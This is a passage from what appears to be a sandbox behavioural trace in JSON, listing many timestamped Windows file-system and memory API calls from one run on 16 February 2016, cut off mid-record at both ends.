"2016-02-16 17:41:58,566", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,576", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,576", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,576", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,576", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,576", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,576", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,586", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,586", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,586", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,596", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,596", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,596", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,596", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,606", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,606", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,606", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,606", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,606", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,606", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,606", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,606", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,616", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,616", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,616", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,616", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,616", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,616", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,616", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,616", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,616", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,626", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,626", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,626", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,626", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,626", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,626", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,626", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,626", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,636", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,636", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,636", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,636", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,636", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,636", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,636", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,636", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,646", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,646", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,646", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,646", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,646", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,646", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,646", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,646", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,656", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,656", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,656", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,656", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,656", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,656", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,667", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,667", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,667", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,667", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,667", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,667", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,667", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,667", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,677", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,677", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,677", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,677", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,677", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,677", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,677", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,677", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,687", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,687", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,687", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,687", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,687", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,687", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,687", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,687", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,697", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,697", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,697", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,697", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,697", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,697", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,697", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,697", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,707", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,707", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,707", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,707", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,707", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,707", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,707", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,727", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,727", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,727", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,727", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,737", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,737", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,737", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,737", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,737", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,737", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,737", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,737", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,747", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,747", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,747", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,747", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,747", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,757", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,757", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,757", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,757", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,757", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,757", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,767", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,767", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,767", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,767", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,767", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,767", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,767", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,777", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,777", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,777", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,777", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,777", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,777", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,777", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,777", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,787", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,787", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,787", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,787", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,787", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,787", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,797", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,797", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,797", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,797", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,797", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,797", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,807", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,807", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,807", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,807", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,807", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,817", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,817", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,817", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,817", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,817", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,817", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,827", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,827", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,827", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,827", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,827", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,827", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,827", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,827", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,837", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,837", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,837", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,837", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,837", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,837", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,847", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,847", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,847", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,847", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,847", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,847", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,847", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,847", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,857", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,867", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,867", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,867", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,877", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,877", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,877", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,877", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,877", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,877", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,877", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,887", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,887", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,887", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,887", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,887", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,887", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,897", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,897", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,897", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,897", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,897", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,897", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,897", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,897", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,907", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,917", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,917", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,917", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,927", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,927", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,927", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,927", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,927", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,927", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,927", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,937", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,937", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,937", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,937", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,937", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,937", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,947", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,947", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,947", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,947", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,947", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,947", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,947", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,947", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,957", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,957", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,957", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,957", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,957", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,957", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,957", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,957", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,967", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,967", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,967", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,967", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,967", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,967", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,977", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,977", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,977", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,977", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,977", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,977", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,987", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,987", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,987", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,987", 